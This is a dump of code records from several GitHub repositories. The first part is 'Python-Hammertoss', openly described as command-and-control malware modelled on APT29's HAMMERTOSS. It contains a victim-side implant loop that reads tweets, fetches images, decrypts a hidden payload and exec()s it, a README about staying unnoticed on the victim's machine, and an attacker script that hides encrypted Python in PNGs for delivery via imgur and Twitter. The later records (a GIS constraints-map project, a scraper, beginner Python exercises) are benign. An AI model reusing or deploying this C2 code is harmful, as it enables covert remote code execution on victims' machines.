decryptor.decrypt(source[AES.block_size:])\n padding = data[-1]\n data = data[:-padding]\n\n return (data.decode('ascii'))\n\ndef execution(command):\n exec(command)\n return True\n\nexec_check = False\nhandle = \"\"\nwhile 1:\n if handle != handle_generator():\n exec_check = False\n handle = handle_generator()\n if exec_check == True:\n continue\n if twitter_checker(handle) == False:\n continue\n tweet = tweet_grabber(handle)\n key, url = parser(tweet)\n image_fetcher(url)\n command = decrypter(key, url)\n exec_check = execution(command)\n\n\n\n\n" }, { 
"alpha_fraction": 0.8061538338661194, "alphanum_fraction": 0.8102564215660095, "avg_line_length": 107.22222137451172, "blob_id": "75144883ef88b8ab92be232df76dfe8af535ec49", "content_id": "10c88ee28c05d4ff20caaaeb595931626c66e09f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 975, "license_type": "no_license", "max_line_length": 419, "num_lines": 9, "path": "/README.md", "repo_name": "popdogsec/Python-Hammertoss", "src_encoding": "UTF-8", "text": "# Python-Hammertoss\nThis is a piece of command and control software that draws inspiration from the HAMMERTOSS malware utilized by APT29. It is written in Python and includes 2 scripts, one to aid the attacker in deploying the commands and the other to control the remote victim. The script to be implanted can be compiled with auto-py-to-exe and when compiled in a windowless fashion does not alert the victim that it has begun operating.\n\nThe heart of this project was to implement a way to deploy commands stealthily over normal web traffic by utilizing steganography. The fetch process for instructions by the victim machine is nothing more than requesting a few social media pages, making it very easy to go unnoticed.\n\nIt should go without saying that this shouldn't be used with out the targets consent. Under no circumstances should this be used in any unlawful way, this project was for educational purposes only.\n\nDEMO:\nhttps://www.youtube.com/watch?v=PQdnS4abGFk\n\n" }, { "alpha_fraction": 0.6910678148269653, "alphanum_fraction": 0.7048354744911194, "avg_line_length": 31.714284896850586, "blob_id": "2099ec9022b4965069c39d5d0fe329f3bb7027dd", "content_id": "6ff50332845f11bda8dab322ddc43bf15f49b28c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2978, "license_type": "no_license", "max_line_length": 192, "num_lines": 91, "path": "/Attacker_Prep.py", "repo_name": "popdogsec/Python-Hammertoss", "src_encoding": "UTF-8", "text": "from bs4 import BeautifulSoup\nfrom urllib.request import urlopen\nimport base64\nfrom Crypto.Cipher import AES\nfrom Crypto.Hash import SHA256\nfrom Crypto import Random\nfrom stegano import lsbset\nfrom stegano.lsbset import generators\nimport random\nimport string\n\ndate = input(\"Enter a date in the following format: mm-dd-yyyy: \\n\")\nday = int(date[3:5])\nmonth = int(date[0:2])\nyear = int(date[6:10])\n\n\nposition = (day + month) * 3\nif position > 100:\n position = position - 100\n\nprestring = str(6 * month) + str(3 * day)\n\npoststring = str(int((2 * year) / 3))\n\nposlength = len(str(position))\noffset = poslength + 2\n\npage = urlopen('https://www.familyeducation.com/baby-names/top-names/boy')\nsoup = BeautifulSoup(page, 'html.parser')\n\nfor ul in soup.find_all('ul', class_='static-top-names part1'):\n line = ul.text\n\nstart = line.find(str(position) + '.')\n\nif start < 0:\n for ul in soup.find_all('ul', class_='static-top-names part2'):\n line = ul.text\n\nstart = line.find(str(position) + '.')\n\nstart = start + offset\nend = line.find('\\n', start)\nname = (line[start:end])\n\nhandle = prestring + name + poststring\nprint(handle)\nwait = input(\"Please create twitter account with the handle presented\")\n\nfile_name = input(\"Please enter the filename without file extension, please note that only PNG images are accepted and should be well below 5MB in order for imgur to keep it in PNG format:\\n\")\noutput_file_name = input(\"Please enter the desired output filename without file 
extension:\\n\")\nno_lines_str = input(\"Please enter the number of lines of python code you wish to inject:\\n\")\nno_lines = int(no_lines_str)\nsource = \"\"\"\"\"\"\nprint(\"Please enter each line of code\")\nfor x in range(no_lines):\n source += input() + \"\\n\"\nsource = source.encode('ascii')\ncharacter_selection = string.ascii_letters + string.digits\nkey = ''.join(random.choice(character_selection) for i in range(10))\ndecoded_key = key\nkey = key.encode('ascii')\n\nkey = SHA256.new(key).digest()\nIV = Random.new().read(AES.block_size)\nencryptor = AES.new(key, AES.MODE_CBC, IV)\npadding = AES.block_size - len(source) % AES.block_size\nsource += bytes([padding]) * padding\ndata = IV + encryptor.encrypt(source)\ndata_encrypted = base64.b64encode(data).decode(\"latin-1\")\n\nsecret_image = lsbset.hide(file_name + \".png\", data_encrypted, generators.eratosthenes())\nsecret_image.save(output_file_name + \".png\")\n\nimgur_link = input(\"Please upload the output file to imgur and enter its extension here: \\n\")\nimgur_link_length = len(imgur_link)\nmiddle = imgur_link_length\n\ntweet_text=\"\"\n\nfor x in range(imgur_link_length):\n if x == 3:\n tweet_text = tweet_text + decoded_key + \" \"\n elif x == 6:\n tweet_text = tweet_text + imgur_link[x]\n continue\n tweet_text = tweet_text + imgur_link[x] + \" \"\nprint(\"Please tweet the string shown below, the code will be executed on the day indictated \\n\")\nprint(\"Please also make sure the twitter url is the same as the handle generated\")\nprint(tweet_text)\n\n" } ]
3
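The Python-Hammertoss README above explains the steganographic hand-off in prose; the two stegano calls the repository's scripts rely on (lsbset.hide and lsbset.reveal with the Eratosthenes prime generator) round-trip like this. A benign sketch for illustration only — cover.png is a placeholder filename, not a file from the repo:

from stegano import lsbset
from stegano.lsbset import generators

# Embed a short message in the least-significant bits of prime-indexed pixels.
secret = lsbset.hide("cover.png", "hello operator", generators.eratosthenes())
secret.save("cover_payload.png")

# The receiver regenerates the same pixel sequence to read the bits back out.
message = lsbset.reveal("cover_payload.png", generators.eratosthenes())
print(message)  # hello operator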
smacken/constraintsmap
https://github.com/smacken/constraintsmap
db425ad65d0066bb3a9812fe08eaed4d2479248d
cf4a6fec3f68ce6da5c0296d7d35190799ad6134
27c06efbe057703aba0b0e9b93c1c174bf1b4e93
refs/heads/master
2020-12-19T10:52:37.370542
2020-02-02T01:26:15
2020-02-02T01:26:15
235,712,132
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6116504669189453, "alphanum_fraction": 0.6145631074905396, "avg_line_length": 24.121952056884766, "blob_id": "609a1b2ab0d3a7bc2f8eca524075cc933cb4eaad", "content_id": "ab54a8057be456680d6642d34aaf62c1d8865e2b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1030, "license_type": "no_license", "max_line_length": 59, "num_lines": 41, "path": "/constraintsmap/constraint/operation.py", "repo_name": "smacken/constraintsmap", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom functools import partial\n\n\nclass Operation:\n # Add\n def __init__(self):\n self.name = 'add'\n self.execute_op = partial(np.add)\n\n def execute(self, img_array, constraint_array):\n return self.execute_op(constraint_array, img_array)\n\n\nclass SubtractOperation(Operation):\n def __init__(self):\n self.name = 'subtract'\n self.execute_op = partial(np.subtract)\n super(SubtractOperation, self).__init__()\n\n\nclass MinOperation(Operation):\n # Floor\n def __init__(self, min=0):\n self.min = min\n self.execute_op = partial(np.clip, min=min)\n super(MinOperation, self).__init__()\n\n\nclass MaxOperation(Operation):\n # ceiling\n def __init__(self, max=0):\n self.max = max\n self.execute_op = partial(np.clip, max=max)\n super(MaxOperation, self).__init__()\n\n\nclass RoundOperation(Operation):\n def __init__(self):\n self.execute_op = partial(np.around, decimals=2)\n super(RoundOperation, self).__init__()\n" }, { "alpha_fraction": 0.46368715167045593, "alphanum_fraction": 0.6815642714500427, "avg_line_length": 14.565217018127441, "blob_id": "e5addc962205b1a53ebcb73584df9911cc2f04d2", "content_id": "0ba7258409eb62e3b97965c9bf59b26a46af96d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 358, "license_type": "no_license", "max_line_length": 25, "num_lines": 23, "path": "/requirements.txt", "repo_name": "smacken/constraintsmap", "src_encoding": "UTF-8", "text": "atomicwrites==1.3.0\nattrs==19.3.0\ncertifi==2019.11.28\ncolorama==0.4.3\nimageio==2.6.1\nimportlib-metadata==1.5.0\njsons==1.1.1\nmccabe==0.6.1\nmore-itertools==8.2.0\nnumpy==1.17.5\nolefile==0.46\npackaging==20.1\nPillow==7.0.0\npluggy==0.13.1\npy==1.8.1\npyparsing==2.4.6\npytest==5.3.5\nrope==0.14.0\nsix==1.14.0\ntypish==1.3.1\nwcwidth==0.1.8\nwincertstore==0.2\nzipp==2.1.0\n" }, { "alpha_fraction": 0.6852589845657349, "alphanum_fraction": 0.6852589845657349, "avg_line_length": 35, "blob_id": "1ad664a1268fbcb03a05336971bf4fa3e34a249b", "content_id": "9e00e6ca3eab6765cb1341c8455587a0e8b7a789", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 251, "license_type": "no_license", "max_line_length": 79, "num_lines": 7, "path": "/constraintsmap/__main__.py", "repo_name": "smacken/constraintsmap", "src_encoding": "UTF-8", "text": "from constraintsmap.common.config import read_config, write_output, read_layers\n\nif __name__ == '__main__':\n config = read_config()\n img_array = read_layers()\n if config.output_location:\n write_output(img_array, config.output_location)" }, { "alpha_fraction": 0.632478654384613, "alphanum_fraction": 0.6373626589775085, "avg_line_length": 29.33333396911621, "blob_id": "b89fb10c2a863cbf5d866470d25c9f493c9cb35c", "content_id": "dd73bc343a522f996e5ad0a310d23fe96362c5a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1638, "license_type": "no_license", "max_line_length": 98, 
"num_lines": 54, "path": "/constraintsmap/geo/buffer.py", "repo_name": "smacken/constraintsmap", "src_encoding": "UTF-8", "text": "from __future__ import (absolute_import, division, print_function,\n unicode_literals)\nfrom enum import Enum\nimport fiona\nfrom shapely.geometry import shape, CAP_STYLE\nfrom constraintsmap.constraint.constraints import Constraint, Operation\nfrom .raster import to_raster_array\n\n\nclass BufferEnd(Enum):\n ROUND = 1\n FLAT = 2\n SQUARE = 3\n\n\ncap_style = {\n BufferEnd.ROUND: CAP_STYLE.round,\n BufferEnd.FLAT: CAP_STYLE.flat,\n BufferEnd.SQUARE: CAP_STYLE.square\n}\n\n''' Buffer constraint example json\n{\n \"id\":\"\",\n \"name\": \"\",\n \"sort_order\": 1,\n \"image\": \"\",\n \"weight\": 1,\n \"operation\": \"Add\",\n \"operation_props\": {}\n}'''\n\n\nclass BufferConstraint(Constraint):\n ''' Create a buffered constraint around a vector '''\n\n @classmethod\n def init_create_geometry(shp_file, buffer_size, buffer_end=BufferEnd.ROUND):\n ''' convert the shape file to a geometry object '''\n with fiona.open(shp_file) as input_shp:\n shp = input_shp.next()\n shp_geo = shape(shp['geometry'])\n buffer_geo = shp_geo.buffer(buffer_size, cap_style=cap_style[buffer_end.lower()])\n return buffer_geo\n\n def __init__(self, shp_file, buffer_size, buffer_end=BufferEnd.ROUND, weight=1, sort_order=0):\n self.constraint_op = Operation()\n self.weight = weight\n self.sort_order = sort_order\n geometry = BufferConstraint.init_create_geometry(shp_file, buffer_size, buffer_end)\n raster = to_raster_array(geometry)\n raster[raster > 0] = weight\n self.img_array = raster\n super(BufferConstraint, self).__init__()\n" }, { "alpha_fraction": 0.5397923588752747, "alphanum_fraction": 0.5513263940811157, "avg_line_length": 29.964284896850586, "blob_id": "293fa689b7cb5373d222c5c062d273d30cfa870c", "content_id": "eadad9f226739cd9162471a6f8eaa20d05a4f479", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 867, "license_type": "no_license", "max_line_length": 62, "num_lines": 28, "path": "/constraintsmap/geo/raster.py", "repo_name": "smacken/constraintsmap", "src_encoding": "UTF-8", "text": "import rasterio\nfrom rasterio.features import rasterize\nfrom rasterio.transform import IDENTITY\nimport numpy as np\n\n\ndef to_raster(geometry, rows, cols, out_file='test.tif'):\n ''' vector geometry to raster '''\n with rasterio.Env():\n result = rasterize([geometry], out_shape=(rows, cols))\n with rasterio.open(\n \"test.tif\",\n 'w',\n driver='GTiff',\n width=cols,\n height=rows,\n count=1,\n dtype=np.uint8,\n nodata=0,\n transform=IDENTITY,\n crs={'init': \"EPSG:4326\"}) as out:\n out.write(result.astype(np.uint8), indexes=1)\n\n\ndef to_raster_array(geometry, rows, cols):\n with rasterio.Env():\n result = rasterize([geometry], out_shape=(rows, cols))\n return result.astype(np.uint8)\n" }, { "alpha_fraction": 0.6728280782699585, "alphanum_fraction": 0.6765249371528625, "avg_line_length": 27.473684310913086, "blob_id": "ebfb53671a2b832a89f2279921dcf9f76ee8e07b", "content_id": "b17ce48fffb566230200eefb146198c347a4446c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 541, "license_type": "no_license", "max_line_length": 77, "num_lines": 19, "path": "/constraintsmap/tests/read_test.py", "repo_name": "smacken/constraintsmap", "src_encoding": "UTF-8", "text": "from __future__ import (absolute_import, division, print_function,\n unicode_literals)\nfrom constraintsmap.common.config 
import read_config, read_constraints\n\n\ndef test_init():\n ''' should pass '''\n assert 1 == 1\n\n\ndef test_read_config():\n config = read_config('./constraintsmap/tests/config.json')\n assert config != None\n assert config.save_location == '/tests/'\n\n\ndef test_read_constraints():\n constraints = read_constraints('./constraintsmap/tests/constraints.json')\n assert constraints != None\n" }, { "alpha_fraction": 0.49751242995262146, "alphanum_fraction": 0.5621890425682068, "avg_line_length": 32.36666488647461, "blob_id": "97b57f021e6959470340f85b4b18e937cafd22c8", "content_id": "6937366dac1b2e4a419e4d1403a4aa12d9bb67e1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1005, "license_type": "no_license", "max_line_length": 74, "num_lines": 30, "path": "/constraintsmap/tests/constraint_test.py", "repo_name": "smacken/constraintsmap", "src_encoding": "UTF-8", "text": "from __future__ import (absolute_import, division, print_function,\n unicode_literals)\nfrom constraintsmap.constraint.operation import Operation\nimport numpy as np\nfrom numpy.linalg import multi_dot\n\n\ndef test_can_add():\n op = Operation()\n first = np.array([[1, 1, 1, 1], [1, 1, 1, 1]])\n second = np.array([[1, 1, 1, 1], [1, 1, 1, 1]])\n result = op.execute(first, second)\n assert np.all([result[0], [2, 2, 2, 2]])\n\n\ndef test_weighted_sum():\n first = np.array([[1, 1, 1, 1], [1, 1, 1, 1]])\n weight = 4\n result = first * weight\n assert np.all([result[0], [4, 4, 4, 4]])\n\n\ndef test_weighted_sums():\n first = np.array([[1, 1, 1, 1], [1, 1, 1, 1]])\n second = np.array([[1, 1, 1, 1], [1, 1, 1, 1]])\n weights = [4, 5]\n weighted_sum = [a * weights[i] for i, a in enumerate([first, second])]\n result = Operation().execute(weighted_sum[0], weighted_sum[1])\n assert np.all([result[0], [4, 4, 4, 4]])\n assert np.all([result[1], [5, 5, 5, 5]]) \n" }, { "alpha_fraction": 0.6735484004020691, "alphanum_fraction": 0.6787096858024597, "avg_line_length": 28.245283126831055, "blob_id": "de2e1ec2ffbbc271eb6cc5fb37c13dc4b0d70d5a", "content_id": "1bd076c3b61c1db096761059dec4396210488147", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1550, "license_type": "no_license", "max_line_length": 122, "num_lines": 53, "path": "/constraintsmap/common/config.py", "repo_name": "smacken/constraintsmap", "src_encoding": "UTF-8", "text": "import imageio\nimport json\nimport jsons\nimport numpy as np\nfrom dataclasses import dataclass\nfrom typing import Optional, Union\n\nfrom constraintsmap.geo.buffer import BufferConstraint\nfrom constraintsmap.constraint.constraints import Constraint, MultiConstraint\n\n\n@dataclass\nclass ConstraintsConfig:\n save_location: str\n output_location: str\n scale: bool = False\n scale_min: int = 0\n scale_max: int = 100\n round: bool = False\n\n\ndef read_constraints(constraint_json):\n with open(constraint_json) as file:\n c_json = json.load(file, encoding='utf8')\n constraints = [jsons.load(c, Union[Constraint, BufferConstraint, MultiConstraint]) for c in c_json['constraints']]\n return constraints\n\n\ndef read_layers():\n constraints = read_constraints()\n weighted_sum = sorted([(c.weight, c.sort_order) for c in constraints],\n key=lambda x: x[1])\n con_arrays = sorted([(c.image, c.sort_order) for c in constraints],\n key=lambda x: x[1])\n # np.dot(a,weights) but with multiple\n return np.linalg.multi_dot(con_arrays, weighted_sum)\n\n\ndef write_output(img_array, output_path):\n 
imageio.imwrite(output_path, img_array)\n\n\ndef read_config(path='./config.json'):\n config = None\n with open(path) as file:\n try:\n dict_config = json.load(file, encoding='utf8')\n config = jsons.load(dict_config, ConstraintsConfig)\n except FileNotFoundError:\n print(path + \" not found. \")\n except ValueError:\n print(\"parse error\")\n return config\n" }, { "alpha_fraction": 0.8075060248374939, "alphanum_fraction": 0.8075060248374939, "avg_line_length": 36.59090805053711, "blob_id": "322749a899d7c28f073ee04390df203e91435f44", "content_id": "d2ac86de460239b6db5fdd1d112be12e1afbff5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 826, "license_type": "no_license", "max_line_length": 86, "num_lines": 22, "path": "/README.md", "repo_name": "smacken/constraintsmap", "src_encoding": "UTF-8", "text": "# Constraints Map\n\nTake a series of layers/constraints and align to a given weighting to \ncombine for an overall constrained output.\nBusically munge together layers with weights for an output.\nEach layer/constraint can have an operation applied e.g. min/max, +/-, multiple, gate\n\nConstraints json\n\nEach constraint layer can be input via a json file.\n\nGeo\n\nAllows constraints layers to be added in shape file format as vectors.\nConstraint operators (e.g. Buffer) can be applied to points/lines/polygons before\nbeing included in the constraints matrix.\n\nConstraint-linking\n\nConstraints can be included based upon the relationship with another constraint-layer.\nFor example: add a layer based upon the intersection of another constraint-layer.\nEach constraint layer is given a unique id which can be linked when creating another." }, { "alpha_fraction": 0.6164267659187317, "alphanum_fraction": 0.6189669966697693, "avg_line_length": 30.91891860961914, "blob_id": "94b8c9313da570bfe265844d10af60912ee7f0ee", "content_id": "5fce4f635c4c7c248e898c443b718d6a1af89063", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1181, "license_type": "no_license", "max_line_length": 96, "num_lines": 37, "path": "/constraintsmap/constraint/constraints.py", "repo_name": "smacken/constraintsmap", "src_encoding": "UTF-8", "text": "import uuid\nimport glob\nimport imageio\nfrom .operation import Operation, SubtractOperation, RoundOperation, MinOperation, MaxOperation\n\n\nclass Constraint:\n constraint_op = None\n\n def __init__(self, name, img_array, operation, operation_props, sort_order=0, weight=1):\n self.id = str(uuid.uuid4())\n self.name = name\n self.img_array = img_array\n self.sort_order = sort_order\n self.weight = weight\n self.operation = operation\n self.operation_props = operation_props\n ops = {\n 'add': Operation(),\n 'subtract': SubtractOperation(),\n 'round': RoundOperation(),\n 'min': MinOperation(**operation_props),\n 'max': MaxOperation(**operation_props)\n }\n self.constraint_op = ops[operation.lower()] if operation.lower() in ops else Operation()\n\n\nclass MultiConstraint(Constraint):\n # like a single constraint but for a directory/path\n\n def __init__(self, path):\n self.path = path\n\n def execute(self):\n for image_path in glob.glob(\"/home/adam/*.png\"):\n im = imageio.imread('my_image.png')\n self.constraint_op.execute(im)\n" }, { "alpha_fraction": 0.6599634289741516, "alphanum_fraction": 0.6819012761116028, "avg_line_length": 29.38888931274414, "blob_id": "08426cce7b5d7079b7973c1edb09c1f11ead70d9", "content_id": "eabe5f6ce3b07d80b88a59c107e587fda02f2713", 
"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 547, "license_type": "no_license", "max_line_length": 102, "num_lines": 18, "path": "/constraintsmap/tests/raster_test.py", "repo_name": "smacken/constraintsmap", "src_encoding": "UTF-8", "text": "from __future__ import (absolute_import, division, print_function,\n unicode_literals)\nfrom constraintsmap.geo.raster import to_raster_array\nfrom constraintsmap.geo.buffer import BufferConstraint\n\n\n# def test_init():\n# ''' should pass '''\n# assert 1 == 1\n\ndef test_to_raster_array():\n geo = BufferConstraint.init_create_geometry('constrainstmap/tests/data/State_Fairgrounds.shp', 10)\n ras_arr = to_raster_array(geo, 100, 100)\n assert ras_arr is not None\n\n\ndef test_to_raster_writes_file():\n assert 1 == 1\n" } ]
11
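constraintsmap's README describes combining layers by weight, and the arithmetic is small enough to show inline. This sketch mirrors test_weighted_sums in constraint_test.py, with invented layers and weights:

import numpy as np

# Two constraint layers of the same shape, plus one weight per layer.
layer_a = np.ones((2, 4))
layer_b = np.ones((2, 4))
weights = [4, 5]

# Weight each layer, then sum element-wise into one combined constraint map.
combined = sum(w * layer for w, layer in zip(weights, [layer_a, layer_b]))
print(combined)  # every cell equals 9.0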
nindyahapsari/ecommerce_scraping
https://github.com/nindyahapsari/ecommerce_scraping
b068f8eabd4f3a274f64564467f2d621261a84e6
25602803f0e05a1d1e5f7d677dd87459f4fb2964
c6e7892b19bc689530188545a6770536c798be5d
refs/heads/master
2020-03-27T00:21:02.532341
2018-08-22T00:06:19
2018-08-22T00:12:25
145,615,381
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8151260614395142, "alphanum_fraction": 0.8151260614395142, "avg_line_length": 28.75, "blob_id": "cf099bc9f328e5aeca78f73dbb757f7a9084464c", "content_id": "d6695ef3068ac4e435b6131cd60c673b0e088329", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 119, "license_type": "no_license", "max_line_length": 48, "num_lines": 4, "path": "/README.md", "repo_name": "nindyahapsari/ecommerce_scraping", "src_encoding": "UTF-8", "text": "# ecommerce_scraping\nPython script for web scraping ecommerce website\n\nUsing : Python, Pandas, BeautifulSoup, Requests\n" }, { "alpha_fraction": 0.6278882026672363, "alphanum_fraction": 0.6380978226661682, "avg_line_length": 30.811965942382812, "blob_id": "1a635a2a6f3e92a8c4abe9f16a6e7c4cecd90a1c", "content_id": "8515e43ee036f78684647b9fc251715e9b170abc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3722, "license_type": "no_license", "max_line_length": 181, "num_lines": 117, "path": "/scraping_data.py", "repo_name": "nindyahapsari/ecommerce_scraping", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n#Python 2.7\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport csv\n\n\nurl = 'https://www.vistaprint.com/business-cards?txi=18264&xnid=AllProductsPage_Business+cards_All+Products&xnav=AllProductsPage&GP=08%2f21%2f2018+14%3a52%3a04&GPS=5146966587&GNF=0'\ncardsurl = requests.get(url)\nsoup = BeautifulSoup(cardsurl.content, 'lxml')\n\n# div tag for the steps of creating bussiness cards\ndiv = soup.find(\"div\", {\"class\" : \"grid-container grid-container-line-wrap\"})\n\n\n# GETTING ALL INFORMATION FROM THE PRODUCTS\n\n# BANNER TAGS\nbanner_tag = div.find_all(\"strong\")\njust_banner = [banner.get_text().strip() for banner in banner_tag]\n\n\n\nname_tag = div.find_all(\"p\", class_=\"standard-product-tile-name\")\njust_name = [ name.get_text().strip() for name in name_tag]\n\ndescription_tag = div.find_all(\"div\", class_=\"standard-product-tile-description\")\njust_descriptions = [des.get_text().strip() for des in description_tag]\n\npricing_tag = div.find_all(\"div\", class_=\"standard-product-tile-pricing\")\njust_pricing = [price.get_text().strip() for price in pricing_tag]\n\nnormal_tag = div.find_all(class_=\"comparative-list-price\")\njust_normal = [normal.get_text().strip() for normal in normal_tag]\n\ndiscount_tag = div.find_all(class_=\"discount-price\")\njust_discount = [discount.get_text().strip() for discount in discount_tag]\n\n\n\n# print(just_banner)\n# print(\"-------------------------------------\")\n# print(just_name)\n# print(\"-------------------------------------\")\n# print(just_descriptions)\n# print(\"-------------------------------------\")\n# print(just_pricing)\n# print(\"-------------------------------------\")\n# print(just_normal)\n# print(\"-------------------------------------\")\n# print(just_discount)\n\n\n\n\nprint(\"___________________________________________________________________________\")\n\nbusinesscards = ({\n\n\t\t\t\"name\" \t\t\t: just_name,\n\t\t\t\"description\" \t: just_descriptions,\n\t\t\t\"pricing\" \t\t: just_pricing,\n\t\t\t\"normal\" \t\t: just_normal,\n\t\t\t\"discount\" \t\t: just_discount\n\t\t\t})\n\n# BCS ARRAYS IS NOT IN THE SAME LENGTH\ndf = pd.DataFrame.from_dict(businesscards, orient='index')\ndf_result = df.transpose()\n\n# REORDERING COLOUMNS\nlabel_arr = df_result[[ 'name', 'description', 'pricing', 'normal', 'discount' 
]]\n\nprint(label_arr)\n\nlabel_arr.to_csv('bussiness_card_list_final.csv', index_label=None )\n\n\n\n\n\n################################################################################\n# SHAPE FOR THE BUSSINESS CARDS\n# steps of shaping the bussiness cards\n# from HTML file\n# row = index[0]\n\n\n# row = div.find_all(\"div\", class_=\"row\")\n\n# tile_name = row.find(class_=\"standard-product-tile-name\").get_text().strip()\n# tile_des = row.find(class_=\"standard-product-tile-description\").get_text().strip()\n# tile_pricing = row.find(\"div\", class_=\"standard-product-tile-pricing\").get_text().strip()\n# tile_normal = row.find(class_=\"comparative-list-price\").get_text()\n# tile_discount = row.find(class_=\"discount-price\").get_text()\n\n# print(tile_name)\n# print(tile_des)\n# print(tile_pricing)\n# print(tile_normal)\n# print(tile_discount)\n\n# FINDING ALL THE FIRST PRODUCTS IN LIST COMPREHENSION\n# names \t\t\t= [name.get_text().strip() for name in row.select(\".standard-product-tile-name\") ]\n# descriptions \t\t= [des.get_text().strip() for des in row.find_all(class_=\"standard-product-tile-description\") ]\n# pricings \t\t\t= [price.get_text().strip() for price in row.find_all(class_=\"standard-product-tile-pricing\") ]\n# normals \t\t\t= [normal.get_text().strip() for normal in row.find_all(class_=\"comparative-list-price\") ]\n# discounts \t\t= [discount.get_text().strip() for discount in row.find_all(class_=\"discount-price\") ]\n\n# print(names)\n# print(descriptions)\n# print(pricings)\n# print(normals)\n# print(discounts)\n" } ]
2
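scraping_data.py flags that its scraped columns come back with unequal lengths ("BCS ARRAYS IS NOT IN THE SAME LENGTH") and works around it with from_dict plus transpose. Here is that pandas trick in isolation, using made-up values rather than the scraped ones:

import pandas as pd

# Lists of different lengths cannot be passed straight to DataFrame(...);
# building row-wise from a dict and transposing pads the gaps with NaN.
scraped = {"name": ["Standard", "Premium"], "pricing": ["$10", "$15", "$20"]}
df = pd.DataFrame.from_dict(scraped, orient="index").transpose()
print(df)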
shriya246/Python-Internship
https://github.com/shriya246/Python-Internship
4e4f99ab5cee92430d514f5465dc6bbe47533da4
3826cfecfaadf5e9f68a5a98368ec7b10cbf95dd
49aba32885acc771ee717f6b3a25d98a3058bc79
refs/heads/main
2023-06-08T14:28:11.684860
2021-06-29T13:38:54
2021-06-29T13:38:54
372,826,060
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.49473685026168823, "alphanum_fraction": 0.5473684072494507, "avg_line_length": 14.166666984558105, "blob_id": "e19a7a5085d3afb5c1dc62272bcf1eac64d24cb7", "content_id": "f1bfd6fb7ef838440d018e6fded8f6da52e415b5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 95, "license_type": "no_license", "max_line_length": 29, "num_lines": 6, "path": "/Day2task2.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "a=20\r\nb=20.5\r\nc=\"Akash Technolabs\"\r\nprint(a)\r\nprint(\"Value of b is : \", b)\r\nprint(\"ompany name is : \", c)" }, { "alpha_fraction": 0.5490848422050476, "alphanum_fraction": 0.580199658870697, "avg_line_length": 21.204633712768555, "blob_id": "6d1005b88d3e99886cfc9773aa22dd0417916b31", "content_id": "d84a0bf2189ce859cae77a46a5a996765c2e8fbf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6010, "license_type": "no_license", "max_line_length": 75, "num_lines": 259, "path": "/Day5.py", "repo_name": "shriya246/Python-Internship", "src_encoding": "UTF-8", "text": "#class\r\n'''class demo:\r\n def myFunction(self):\r\n print(\"This is myFunctionof class... \")\r\n def show(self,name):\r\n print(\"Value is\",name)\r\nd1=demo()\r\nd1.myFunction()\r\nd1.show(\"Shriya\")'''\r\n\r\n#EXAMPLE\r\n'''class Myclass:\r\n def func1(self):\r\n print('Hello')\r\n def func2(self,name):\r\n print('Name is : '+name)\r\n#create a object of Myclass\r\nmyc = Myclass()\r\n#calling function\r\nmyc.func1()\r\nmyc.func2(\"Amazon\")'''\r\n\r\n#sum of 2 number using class\r\n'''class Myclass:\r\n def func1(self,n1,n2):\r\n ans=n1+n2\r\n print('Ans is : ',ans)\r\n#creat a object of Myclass\r\nmyc = Myclass()\r\n#calling function\r\nmyc.func1(20,30)'''\r\n\r\n#python constructors\r\n'''class demo:\r\n def myFunction(self):\r\n print(\"This is myFunctionof class...\")\r\n def show(self,name):\r\n print(\"Value is \",name)\r\n def __init__(self,nm):\r\n print(\"This is demo class...\")\r\n print(\"Name is \",nm)\r\nd1=demo(\"xyz\")\r\nd1.myFunction()\r\nd1.show(\"Shriya\")'''\r\n\r\n#assign string value to class variable using method\r\n'''class Demo:\r\n name=\"\"\r\n def func1(self):\r\n print(\"This is normal method...\")\r\n def func2(self,name):\r\n self.name=name\r\n def show(self):\r\n print(\"Name is \",self.name)\r\nd1=Demo()\r\nd1.func1()\r\nd1.func2(\"Shriya\")\r\nd1.show()'''\r\n\r\n#example\r\n'''class Myclass:\r\n name=\"\"\r\n def func1(self):\r\n print(\"Hello Function1\")\r\n def func2(self,name):\r\n self.name=name\r\n def func3(self):\r\n print(\"Value is \",self.name)\r\nm1=Myclass()\r\nm1.func1()\r\nm1.func2(\"Shriya\")\r\nm1.func3()'''\r\n\r\n#assign string value to class variable using constructor\r\n'''class Myclass:\r\n name= \"\"\r\n def __init__(self,name):\r\n self.name = name\r\n def func1(self):\r\n print(\"Name is : \", self.name)\r\nmyc = Myclass(\"Shriya Patel\")''' \r\n\r\n#Example\r\n'''class Myclass:\r\n n1=0\r\n n2=0\r\n\r\n #constructor\r\n\r\n def __init__(self,n1,n2):\r\n self.n1=n1\r\n self.n2=n2\r\n\r\n #Function\r\n def func1(self):\r\n ans=self.n1+self.n2\r\n print('Ans is :',ans)\r\n\r\n#create a object of MyClass\r\nmyc=Myclass(10,20)\r\n\r\n#Calling Function\r\nmyc.func1()'''\r\n\r\n#single level inheritance\r\n'''class Demo:\r\n def 